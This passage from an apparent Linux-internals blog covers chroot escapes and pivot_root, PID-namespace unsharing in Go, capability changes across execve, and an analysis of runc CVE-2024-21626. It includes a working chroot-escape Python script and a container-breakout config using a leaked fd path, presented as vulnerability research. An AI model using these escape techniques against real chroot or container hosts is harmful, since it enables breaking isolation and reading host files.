# ls /
bin cdrom etc lib lib64 lost+found mnt proc run snap swapfile test usr
boot dev home lib32 libx32 media opt root sbin srv sys tmp var
</code></pre></div></div>
<h3> The underneath </h3>
<p>Let’s comment out the first chroot.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@test-VirtualBox:/tmp/chroottest# cat test.py
import os
#if not os.path.exists("chroot"):
# os.mkdir("chroot")
#os.chroot("chroot")
os.chdir("../../../../../../..")
os.chroot(".")
os.system("/bin/sh")
root@test-VirtualBox:/tmp/chroottest# chroot .
bash-5.0# ls /
bin chroot lib lib64 test.py usr
bash-5.0# python3 /test.py
# ls /
bin chroot lib lib64 test.py usr
#
</code></pre></div></div>
<p>As we can see, if we don’t call the first chroot, we can’t escape the chroot environment.
Let’s dive into the internals.
The chroot syscall is quite simple.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE1(chroot, const char __user *, filename)
{
struct path path;
int error;
unsigned int lookup_flags = LOOKUP_FOLLOW | LOOKUP_DIRECTORY;
retry:
error = user_path_at(AT_FDCWD, filename, lookup_flags, &path);
...
if (!ns_capable(current_user_ns(), CAP_SYS_CHROOT))
goto dput_and_out;
error = security_path_chroot(&path);
if (error)
goto dput_and_out;
set_fs_root(current->fs, &path);
...
}
</code></pre></div></div>
<p>It just calls ‘set_fs_root’ to set the root path in ‘current->fs’ to the new directory.
The ‘chdir’ syscall is quite similar to the ‘chroot’ syscall. The magic is the handling of ‘../../..’ in chdir; this is the core of the chroot escape. Let’s see how it works.
chdir->user_path_at->user_path_at_empty->filename_lookup->path_lookupat.
The ‘path_lookupat’ function begins the path lookup process; it’s quite complicated, as paths can be complex. Here we only focus on the ‘follow_dotdot’ (or ‘follow_dotdot_rcu’) function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct dentry *follow_dotdot(struct nameidata *nd)
{
struct dentry *parent;
if (path_equal(&nd->path, &nd->root))
goto in_root;
if (unlikely(nd->path.dentry == nd->path.mnt->mnt_root)) {
...
}
/* rare case of legitimate dget_parent()... */
parent = dget_parent(nd->path.dentry);
if (unlikely(!path_connected(nd->path.mnt, parent))) {
dput(parent);
return ERR_PTR(-ENOENT);
}
return parent;
in_root:
if (unlikely(nd->flags & LOOKUP_BENEATH))
return ERR_PTR(-EXDEV);
return dget(nd->path.dentry);
}
</code></pre></div></div>
<p>Here ‘path_equal’ compares the directory with the root; if they are the same, we just return. This means that if our cwd is ‘/’, then after executing ‘chdir(../../..)’ we will still be in ‘/’.
What if we execute another ‘chroot’ inside the chroot environment? The root directory of our process will then be an inner directory, but our current working directory will be outside the new root directory. If we now execute ‘chdir’, the ‘path_equal’ check in ‘follow_dotdot’ never evaluates to true, and we finally reach the real root. Once our cwd is the real root of the filesystem, we can execute ‘chroot(‘.’)’ to change the root directory to the real root. Thus we escape from the chroot environment.</p>
<h3> chroot and pivot_root </h3>
<p>As we can see, ‘chroot’ only changes the ‘root’ directory in the process’s fs_struct, so if the process has ‘CAP_SYS_CHROOT’ it can escape the chroot environment easily. There is another syscall to change the rootfs: ‘pivot_root’.
pivot_root() changes the root mount in the mount namespace of the calling process. More precisely, it moves the root mount to the directory put_old and makes new_root the new root mount. pivot_root() also changes the root directory and the current working directory of each process or thread in the same mount namespace to new_root if they point to the old root directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
const char __user *, put_old)
{
struct path new, old, root;
struct mount *new_mnt, *root_mnt, *old_mnt, *root_parent, *ex_parent;
struct mountpoint *old_mp, *root_mp;
int error;
if (!may_mount())
return -EPERM;
error = user_path_at(AT_FDCWD, new_root,
LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &new);
if (error)
goto out0;
error = user_path_at(AT_FDCWD, put_old,
LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &old);
...
/* mount old root on put_old */
attach_mnt(root_mnt, old_mnt, old_mp);
/* mount new_root on / */
attach_mnt(new_mnt, root_parent, root_mp);
mnt_add_count(root_parent, -1);
touch_mnt_namespace(current->nsproxy->mnt_ns);
/* A moved mount should not expire automatically */
list_del_init(&new_mnt->mnt_expire);
put_mountpoint(root_mp);
unlock_mount_hash();
chroot_fs_refs(&root, &new);
error = 0;
...
return error;
}
void chroot_fs_refs(const struct path *old_root, const struct path *new_root)
{
struct task_struct *g, *p;
struct fs_struct *fs;
int count = 0;
read_lock(&tasklist_lock);
do_each_thread(g, p) {
task_lock(p);
fs = p->fs;
if (fs) {
int hits = 0;
spin_lock(&fs->lock);
write_seqcount_begin(&fs->seq);
hits += replace_path(&fs->root, old_root, new_root);
hits += replace_path(&fs->pwd, old_root, new_root);
write_seqcount_end(&fs->seq);
while (hits--) {
count++;
path_get(new_root);
}
spin_unlock(&fs->lock);
}
task_unlock(p);
} while_each_thread(g, p);
read_unlock(&tasklist_lock);
while (count--)
path_put(old_root);
}
</code></pre></div></div>
<p>Unlike chroot, pivot_root calls ‘chroot_fs_refs’ to retarget the root and cwd of every task in the mount namespace from the old root to the new one. Finally, let’s craft a pivot_root use case.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@test-VirtualBox:/home/test/pivottest# mkdir rootfs
root@test-VirtualBox:/home/test/pivottest# docker export $(docker create busybox) | tar -C rootfs -xvf -
root@test-VirtualBox:/home/test/pivottest# unshare --user --mount --ipc --pid --net --uts -r --fork --propagation private bash
root@test-VirtualBox:/home/test/pivottest# ls
rootfs
root@test-VirtualBox:/home/test/pivottest# mkdir rootfs/old_root
root@test-VirtualBox:/home/test/pivottest# ls rootfs/old_root/
root@test-VirtualBox:/home/test/pivottest# mount --bind rootfs rootfs
root@test-VirtualBox:/home/test/pivottest# pivot_root ./rootfs ./rootfs/old_root/
root@test-VirtualBox:/home/test/pivottest# exec sh
/old_root/home/test/pivottest # ls
rootfs
/old_root/home/test/pivottest # ls /
bin etc lib old_root root tmp var
dev home lib64 proc sys usr
/old_root/home/test/pivottest # ls /old_root
bin home lost+found root swapfile var
boot lib media run sys
cdrom lib32 mnt sbin test
dev lib64 opt snap tmp
etc libx32 proc srv usr
/old_root/home/test/pivottest # umount -l /old_root
/old_root/home/test/pivottest # ls -lh /old_root
total 0
/ # rm old_root -rf
/ # ls
bin etc lib proc sys usr
dev home lib64 root tmp var
/ #
</code></pre></div></div>
<h3> Ref </h3>
<ul>
<li>https://tbhaxor.com/breaking-out-of-chroot-jail-shell-environment/</li>
<li>https://github.com/Kevin-fqh/learning-k8s-source-code/blob/master/docker/(22)shell%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E5%AE%B9%E5%99%A8.md</li>
</ul>
Multi-thread process can't unshare pid namespace (in some old Linux version)2024-05-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/05/01/unsharepid-multiprocess
<h3> The issue </h3>
<p>When we unshare CLONE_NEWPID in a Go program, we get an EINVAL error. Following is the test code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package main
import (
"fmt"
"os"
"os/exec"
"syscall"
)
func main() {
// Unshare the PID namespace
if err := syscall.Unshare(syscall.CLONE_NEWPID); err != nil {
fmt.Fprintf(os.Stderr, "Error unsharing PID namespace: %v\n", err)
os.Exit(1)
}
// At this point, the current process is the first process in the new PID namespace
// Run a shell
cmd := exec.Command("/bin/sh")
// Set up the file descriptors
cmd.Stdin = os.Stdin
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
// Run the command
if err := cmd.Run(); err != nil {
fmt.Fprintf(os.Stderr, "Error running shell: %v\n", err)
os.Exit(1)
}
fmt.Println("Exited shell")
}
</code></pre></div></div>
<p>As we can see</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@xxx:~# ./test
Error unsharing PID namespace: invalid argument
</code></pre></div></div>
<p>This surprised me at first, as Linux has supported PID namespaces for a very long time. After some tests, I found this only occurs on Linux 3.10.</p>
<h3> The solution </h3>
<p>Then I went to the unshare source.</p>
<p>Following <a href="https://github.com/torvalds/linux/blob/v3.10/kernel/fork.c#L1819-L1830">code</a> got my attention:</p>
<p>When the application specifies CLONE_NEWPID, the kernel also sets the CLONE_THREAD, CLONE_VM and CLONE_SIGHAND flags.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)
{
...
if (unshare_flags & CLONE_NEWPID)
unshare_flags |= CLONE_THREAD;
/*
* If unsharing a thread from a thread group, must also unshare vm.
*/
if (unshare_flags & CLONE_THREAD)
unshare_flags |= CLONE_VM;
/*
* If unsharing vm, must also unshare signal handlers.
*/
if (unshare_flags & CLONE_VM)
unshare_flags |= CLONE_SIGHAND;
...
}
</code></pre></div></div>
<p>Later, the <a href="https://github.com/torvalds/linux/blob/v3.10/kernel/fork.c#L1734">unshare</a> function checks whether one of CLONE_THREAD, CLONE_SIGHAND or CLONE_VM is set; if so and the process has more than one thread, it returns EINVAL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int check_unshare_flags(unsigned long unshare_flags)
{
...
if (unshare_flags & (CLONE_THREAD | CLONE_SIGHAND | CLONE_VM)) {
/* FIXME: get_task_mm() increments ->mm_users */
if (atomic_read(&current->mm->mm_users) > 1)
return -EINVAL; // this is the case
}
return 0;
}
</code></pre></div></div>
<p>This means a multi-threaded process can’t unshare the PID namespace. This restriction was introduced in the ‘<a href="https://github.com/torvalds/linux/commit/50804fe3737ca6a5942fdc2057a18a8141d00141">unshare pid namespace</a>’ commit. Later, <a href="https://github.com/torvalds/linux/commit/6e556ce209b09528dbf1931cbfd5d323e1345926">this commit</a> changed the behaviour to allow multi-threaded processes to unshare the PID namespace, so the error only occurs from Linux 3.8 to Linux 3.12.</p>
<h3> The internals </h3>
<p>When unsharing the PID namespace was first introduced (Linux 3.8), multi-threaded processes were not allowed to do it. As a Go program is a multi-threaded process, it gets an EINVAL when unsharing the PID namespace. Later, in Linux 3.12, this restriction was lifted.
Finally, let’s test a more complicated unshare PID namespace case. In this case:</p>
<ol>
<li>we create two threads</li>
<li>the first thread unshare PID namespace and then create a new process</li>
<li>the second thread create a new process after the first thread unshare the PID namespace</li>
</ol>
<p>Following is the code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
// Global flag used for synchronization
volatile int pid_namespace_unshared = 0;
// Get the current thread's TID
pid_t gettid() {
return syscall(SYS_gettid);
}
// Thread function: unshare the PID namespace
void* thread_function_unshare(void* arg) {
printf("Thread 1 (PID: %d, TID: %ld) is starting to unshare PID namespace...\n", getpid(), (long)gettid());
// Try to unshare the PID namespace
if (unshare(CLONE_NEWPID) == -1) {
perror("unshare");
exit(EXIT_FAILURE);
}
printf("Thread 1 (PID: %d, TID: %ld) has unshared PID namespace.\n", getpid(), (long)gettid());
pid_namespace_unshared = 1; // mark the unshare work as done
// We need to fork a new process to activate the PID namespace
pid_t pid = fork();
if (pid == 0) {
// The child process just exits
printf("Child process of Thread 1 (PID: %d, TID: %ld) exiting to activate PID namespace.\n", getpid(), (long)gettid());
exit(EXIT_SUCCESS);
} else if (pid > 0) {
// The parent (thread 1) waits for the new child to exit
waitpid(pid, NULL, 0);
} else {
perror("fork");
exit(EXIT_FAILURE);
}
return NULL;
}
// Thread function: create a child process that sleeps
void* thread_function_spawn_child(void* arg) {
// Wait for thread 1 to finish the unshare operation
while (!pid_namespace_unshared) {
usleep(100); // brief sleep
}
printf("Thread 2 (PID: %d, TID: %ld) is spawning a child process...\n", getpid(), (long)gettid());
pid_t pid = fork();
if (pid == 0) {
// Child process
printf("Child process of Thread 2 (PID: %d, TID: %ld) is starting to sleep for 20 seconds...\n", getpid(), (long)gettid());
sleep(20);
printf("Child process of Thread 2 (PID: %d, TID: %ld) has finished sleeping.\n", getpid(), (long)gettid());
exit(EXIT_SUCCESS);
} else if (pid > 0) {
// The parent (thread 2) waits for the child to exit
waitpid(pid, NULL, 0);
} else {
perror("fork");
exit(EXIT_FAILURE);
}
return NULL;
}
int main() {
printf("Main process (PID: %d, TID: %ld) is starting...\n", getpid(), (long)gettid());
pthread_t thread1, thread2;
// Create thread 1, which unshares the PID namespace
if (pthread_create(&thread1, NULL, thread_function_unshare, NULL) != 0) {
perror("Failed to create thread 1");
return 1;
}
// Create thread 2, which creates a child process after thread 1 finishes the unshare
if (pthread_create(&thread2, NULL, thread_function_spawn_child, NULL) != 0) {
perror("Failed to create thread 2");
return 1;
}
// Wait for both threads to finish
if (pthread_join(thread1, NULL) != 0) {
perror("Failed to join thread 1");
return 1;
}
if (pthread_join(thread2, NULL) != 0) {
perror("Failed to join thread 2");
return 1;
}
printf("Main process (PID: %d, TID: %ld) has finished executing.\n", getpid(), (long)gettid());
return 0;
}
</code></pre></div></div>
<p>Following show the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@xxx:~# ./test3
Main process (PID: 1820, TID: 1820) is starting...
Thread 1 (PID: 1820, TID: 1821) is starting to unshare PID namespace...
Thread 1 (PID: 1820, TID: 1821) has unshared PID namespace.
Thread 2 (PID: 1820, TID: 1822) is spawning a child process...
Child process of Thread 1 (PID: 1, TID: 1) exiting to activate PID namespace.
Child process of Thread 2 (PID: 1824, TID: 1824) is starting to sleep for 20 seconds...
Child process of Thread 2 (PID: 1824, TID: 1824) has finished sleeping.
Main process (PID: 1820, TID: 1820) has finished executing.
</code></pre></div></div>
<p>As we can see, only the first thread’s child is in the new PID namespace. So we can unshare the PID namespace in one thread, and only that thread’s child processes will be in the new PID namespace.</p>
Linux process capability change through execve syscall2024-02-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/02/24/cap-change-execve
<h3> The issue </h3>
<p>I have encountered an interesting issue about capability changes through the execve syscall. Once we drop the current process’s capabilities and then execve another program, the new program gets the dropped capabilities back. The following PoC shows this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package main
import (
"os"
"time"
goruntime "runtime"
"os/exec"
"syscall"
"github.com/syndtr/gocapability/capability"
)
func main() {
cap1, _ := capability.NewPid(os.Getpid())
goruntime.LockOSThread()
defer goruntime.UnlockOSThread()
cap1.Unset(capability.EFFECTIVE, 2)
cap1.Unset(capability.PERMITTED, 2)
cap1.Unset(capability.INHERITABLE, 2)
cap1.Unset(capability.BOUNDING, 2)
cap1.Unset(capability.AMBIENT, 2)
cap1.Apply(capability.CAPS)
time.Sleep(20 * time.Second)
binary, lookErr := exec.LookPath("bash")
if lookErr != nil {
panic(lookErr)
}
args := []string{"bash"}
env := os.Environ()
execErr := syscall.Exec(binary, args, env)
if execErr != nil {
panic(execErr)
}
}
</code></pre></div></div>
<p>During the Sleep, we see the process has the following capabilities:</p>
<p><img src="/assets/img/capexecve/1.png" alt="" /></p>
<p>After execve, we see the same process has following cap:</p>
<p><img src="/assets/img/capexecve/2.png" alt="" /></p>
<p>This means the capabilities were not dropped in the new program.</p>
<h3> The solution </h3>
<p>It shocked me at first, but after a quick thought I found the reason: we don’t fork. A child process inherits its parent’s capabilities, but without a fork, execve applies its own capability logic, and in this case the new program ends up with full capabilities.
The quick solution is to use fork+execve, but our scenario can’t use fork for some reason.
After some more thought, I suddenly remembered that Linux has a process attribute named ‘no_new_privs’. The ‘no_new_privs’ <a href="https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt">document</a> says:</p>
<blockquote>
<p>With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.</p>
</blockquote>
<p>But almost all of the document is about setuid, not capabilities.
Then I tried the following code: add Prctl(unix.PR_SET_NO_NEW_PRIVS) after dropping the capabilities, then do the execve syscall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package main
import (
"fmt"
"os"
"time"
goruntime "runtime"
"os/exec"
"syscall"
"github.com/syndtr/gocapability/capability"
"golang.org/x/sys/unix"
)
func main() {
cap1, _ := capability.NewPid(os.Getpid())
goruntime.LockOSThread()
defer goruntime.UnlockOSThread()
cap1.Unset(capability.EFFECTIVE, 2)
cap1.Unset(capability.PERMITTED, 2)
cap1.Unset(capability.INHERITABLE, 2)
cap1.Unset(capability.BOUNDING, 2)
cap1.Unset(capability.AMBIENT, 2)
cap1.Apply(capability.CAPS)
if err := unix.Prctl(unix.PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); err != nil {
fmt.Println("set new privs error")
}
time.Sleep(20 * time.Second)
binary, lookErr := exec.LookPath("bash")
if lookErr != nil {
panic(lookErr)
}
args := []string{"bash"}
env := os.Environ()
execErr := syscall.Exec(binary, args, env)
if execErr != nil {
panic(execErr)
}
}
</code></pre></div></div>
<p>After execve, I see the following process capabilities; as we can see, it works.</p>
<p><img src="/assets/img/capexecve/3.png" alt="" /></p>
<h3> The internals </h3>
<p>When execve detects that the current process has no_new_privs set, it adds the ‘LSM_UNSAFE_NO_NEW_PRIVS’ flag to ‘bprm->unsafe’ in the ‘check_unsafe_exec’ function in fs/exec.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void check_unsafe_exec(struct linux_binprm *bprm)
{
struct task_struct *p = current, *t;
unsigned n_fs;
...
/*
* This isn't strictly necessary, but it makes it harder for LSMs to
* mess up.
*/
if (task_no_new_privs(current))
bprm->unsafe |= LSM_UNSAFE_NO_NEW_PRIVS;
...
}
</code></pre></div></div>
<p>Later, the ‘cap_bprm_creds_from_file’ function in security/commoncap.c checks ‘bprm->unsafe & ~LSM_UNSAFE_PTRACE’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int cap_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file)
{
...
/* Don't let someone trace a set[ug]id/setpcap binary with the revised
* credentials unless they have the appropriate permit.
*
* In addition, if NO_NEW_PRIVS, then ensure we get no new privs.
*/
is_setid = __is_setuid(new, old) || __is_setgid(new, old);
if ((is_setid || __cap_gained(permitted, new, old)) &&
((bprm->unsafe & ~LSM_UNSAFE_PTRACE) ||
!ptracer_capable(current, new->user_ns))) {
/* downgrade; they get no more than they had, and maybe less */
if (!ns_capable(new->user_ns, CAP_SETUID) ||
(bprm->unsafe & LSM_UNSAFE_NO_NEW_PRIVS)) {
new->euid = new->uid;
new->egid = new->gid;
}
new->cap_permitted = cap_intersect(new->cap_permitted,
old->cap_permitted);
}
...
}
</code></pre></div></div>
<p>If this is true, it calculates the new cap_permitted using ‘cap_intersect’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> new->cap_permitted = cap_intersect(new->cap_permitted,
old->cap_permitted);
</code></pre></div></div>
<p>In this way, the capabilities dropped by the current process also constrain the newly execve’d program.</p>
Why Golang eat my fd 3 in child process2024-02-03T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/02/03/golang-eat-fd3
<p>Recently I analyzed the runc vulnerability CVE-2024-21626. The root cause of this vulnerability is that a cgroup fd is leaked to the ‘runc init’ process. While digging into it, I found something interesting about Golang’s fd inheritance. This post describes the findings in detail.
First we need to have a look at CVE-2024-21626.</p>
<h3> CVE-2024-21626 analysis </h3>
<h4> runc double clone process </h4>
<p>While creating the container environment, runc uses a double-clone method to carry out the complicated, separated setup steps. The following picture shows the process.</p>
<p><img src="/assets/img/golangeatfd3/1.png" alt="" /></p>
<p>runc first starts the runc[0:PARENT] process; runc[0:PARENT] clones a runc[1:CHILD] process, runc[1:CHILD] clones the runc[2:INIT] process, and finally runc[2:INIT] executes the process specified in the OCI configuration.</p>
<h4> runc fd leak vulnerability </h4>
<p>runc[2:INIT] does the final work, such as preparing the rootfs, chrooting into it, and finding the executable, before executing the container process. In this process, an fd can be leaked to the container process. As the fd points to a file in the host filesystem, if the container process can see this fd it can break out of the container environment by leveraging it. runc has had several vulnerabilities of this kind in its history; the most famous is CVE-2019-5736. The root cause of CVE-2019-5736 is that the container process can see /proc/self/exe, which points to the host runc binary. The following picture (from https://blog.wohin.me/posts/hack-runc-elf-inject/) shows the root cause of CVE-2019-5736 and how to exploit it.</p>
<p><img src="/assets/img/golangeatfd3/2.png" alt="" /></p>
<h4> CVE-2024-21626 </h4>
<p>The root cause of this vulnerability is that an fd pointing to the /sys/fs/cgroup directory is leaked to the runc init process. The leak happens here, in libcontainer/cgroups/file.go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func prepareOpenat2() error {
prepOnce.Do(func() {
fd, err := unix.Openat2(-1, cgroupfsDir, &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH, // no unix.O_CLOEXEC flag
})
...
</code></pre></div></div>
<p>unix.Openat2 is used to open cgroupfsDir (/sys/fs/cgroup) without the unix.O_CLOEXEC flag set. After runc init execves the container process, this fd is not closed and is thus leaked to the container process.
When we add a Sleep in runc init, we can see the following:</p>
<p><img src="/assets/img/golangeatfd3/3.png" alt="" /></p>
<p>As we can see, fd 7 points to /sys/fs/cgroup. We can set the ‘cwd’ in the OCI config to ‘/proc/self/fd/7/../../../../’; when the container process runs, its current working directory will point to the host rootfs.
Use the following ‘args’ and ‘cwd’ to run a container:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "args": [
"cat", "hostfile"
],
...
"cwd": "/proc/self/fd/7/../../../../",
</code></pre></div></div>
<p>We can see the container process reads the file successfully.</p>
<p><img src="/assets/img/golangeatfd3/4.png" alt="" /></p>
<p>It doesn’t seem difficult to understand this vulnerability. But while reading the fix patches, I found something interesting. First, after applying the backported commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>, I can’t see the fd leak any more. I also noticed these words:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> In practice, on runc 1.1 this does leak to "runc init" but on main the
handle has a low enough file descriptor that it gets clobbered by the
ForkExec of "runc init".
</code></pre></div></div>
<p>I wanted to know how it gets ‘clobbered’. Also, in cgroup v2 this issue doesn’t exist, and runc exec doesn’t trigger it.
In summary, several questions attracted my attention.</p>
<ol>
<li>Why the main branch isn’t affected by this CVE</li>
<li>Why cgroup v2 isn’t affected by this CVE</li>
<li>Why the first patch mitigates this CVE</li>
<li>Why ‘runc exec’ doesn’t trigger this CVE</li>
</ol>
<p>I decided to dig into this issue.</p>
<h3> The fd inheritance in Golang cmd Run </h3>
<p>First of all, I needed to find out the fd inheritance behaviour of os.Open and syscall.Openat2, as the first relates to commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a> and the second relates to the fd leak. I wrote two simple programs. The first is ‘wait’; it is just there to be launched by the other program, ‘test’. After ‘wait’ starts, we can inspect the fd status of the two processes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //wait
package main
import "time"
func main() {
time.Sleep(20 * time.Second)
}
</code></pre></div></div>
<h4> os.Open fd </h4>
<p>Using following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> os.Open("/home/test")
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p><img src="/assets/img/golangeatfd3/5.png" alt="" /></p>
<p>cmd.Run uses ForkExec to start a new process. As we can see, the child process (‘wait’ here) doesn’t inherit the fd opened by os.Open. This is because os.Open adds O_CLOEXEC, so every file opened by os.Open is closed on execve. The source code can be found <a href="https://github.com/golang/go/blob/master/src/os/file_unix.go#L272">here</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func openFileNolog(name string, flag int, perm FileMode) (*File, error) {
...
var r int
var s poll.SysFile
for {
var e error
r, s, e = open(name, flag|syscall.O_CLOEXEC, syscallMode(perm))
...
</code></pre></div></div>
<h4> syscall.Openat2 fd </h4>
<p>Let’s see the behaviour of syscall.Openat2. Use following ‘test’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.Run()
</code></pre></div></div>
<p>As we can see the “/sys/fs/cgroup” fd in the child process.</p>
<p><img src="/assets/img/golangeatfd3/6.png" alt="" /></p>
<p>So the fd opened by ‘unix.Openat2’ is not closed across ForkExec and is inherited by the child process.</p>
<h4> The magic </h4>
<p>When I applied just the commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>, the interesting thing happened. Though ‘runc run’ has an fd pointing to ‘/sys/fs/cgroup’, ‘runc init’ does not have this fd. The cgroupfd opened in ‘tryDefaultCgroupRoot’ is closed in time after applying the 937c commit, so the ‘runc run’ fd 3 is the fd opened in the ‘prepareOpenat2’ function.</p>
<p><img src="/assets/img/golangeatfd3/7.png" alt="" /></p>
<p>But as we saw in our previous test, the fd opened by ‘syscall.Openat2’ is inherited by the child process, yet here we don’t see the fd in the child process. What’s wrong?
After navigating the runc code and doing some experiments, I found that the main difference between how runc starts a new process and my test is that, in the runc case, cmd.ExtraFiles is also set before cmd.Run is called.
Let’s do the following test.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>Following is the fd of parent and child process.</p>
<p><img src="/assets/img/golangeatfd3/8.png" alt="" /></p>
<p>We have reproduced the issue: fd 3 is eaten by Golang after cmd.Run if we add cmd.ExtraFiles. What if we open two fds with unix.Openat2?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> unix.Openat2(-1, "/sys/fs/cgroup", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
unix.Openat2(-1, "/home/test", &unix.OpenHow{
Flags: unix.O_DIRECTORY | unix.O_PATH})
cmd := exec.Command("/home/test/go/src/test/wait")
cmd.SysProcAttr = &unix.SysProcAttr{}
pipeRead, pipeWrite, _ := os.Pipe()
defer pipeRead.Close()
defer pipeWrite.Close()
cmd.ExtraFiles = []*os.File{pipeWrite}
cmd.Run()
</code></pre></div></div>
<p>As we can see, only fd 3 is eaten.</p>
<p><img src="/assets/img/golangeatfd3/9.png" alt="" /></p>
<p>After reading the Go source and documentation, I found the following words in https://pkg.go.dev/os/exec.</p>
<p><img src="/assets/img/golangeatfd3/10.png" alt="" /></p>
<p>ExtraFiles specifies additional open files to be inherited by the child process; entry i becomes file descriptor 3+i, as the first three are standard input/output/error. If we add two ExtraFiles, we can see that our fd 4 is also eaten.</p>
<p><img src="/assets/img/golangeatfd3/11.png" alt="" /></p>
<p>Now it’s clear: cmd.ExtraFiles is guaranteed to be visible in the child process, and it may overwrite fds inherited from the parent.</p>
<h3> Conclusion </h3>
<h4> About the CVE-2024-21626 </h4>
<p>After the investigation, we can now see the full picture of CVE-2024-21626.
The root cause of this CVE is that a cgroupfd is leaked to ‘runc init’. This cgroupfd is opened in prepareOpenat2 using syscall.Openat2 without the O_CLOEXEC flag set, so it leaks to ‘runc init’.
The main branch is not affected because it has commit <a href="https://github.com/opencontainers/runc/pull/4004/commits/937ca107c3d22da77eb8e8030f2342253b980980">937ca107c3d22da77eb8e8030f2342253b980980</a>. This commit closes another opened cgroupfd in time, so the fd opened in prepareOpenat2 gets number 3, which is low enough to be clobbered by cmd.Run (ForkExec).
cgroup v2 is not affected because tryDefaultCgroupRoot opens a cgroupfd only on cgroup v1, so even without commit 937c the prepareOpenat2 fd is 3.
‘runc exec’ doesn’t trigger this CVE because tryDefaultCgroupRoot is only called in the ‘runc init’ process, not in ‘runc exec’, so there too the prepareOpenat2 fd is 3.</p>
<h4> Golang fd inheritance after cmd Run </h4>
<p>Three takeaways from this CVE.</p>
<ol>
<li>An os.Open fd is automatically closed on execve, as Golang adds O_CLOEXEC implicitly</li>
<li>A syscall.Openat2 fd is not closed automatically and is inherited by the child process, even when this is unwanted</li>
<li>Golang only guarantees that cmd.ExtraFiles will be inherited by the child process, and this may clobber unintentionally inherited fds.</li>
</ol>
<h3> Ref </h3>
<p>The runc internals(written by myself): https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3</p>
mount procfs in unprivileged container2023-12-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2023/12/29/mount-procfs-in-container
<h3> Background </h3>
<p>gVisor is an application kernel that implements a substantial portion of the Linux system surface. gVisor is mostly used in cloud native environments as it implements an OCI runtime, runsc. runsc uses the application kernel, named Sentry, to run the user’s application. This way, the application doesn’t share the same kernel with the host as it does under runc, which largely reduces the attack surface in the container ecosystem.</p>
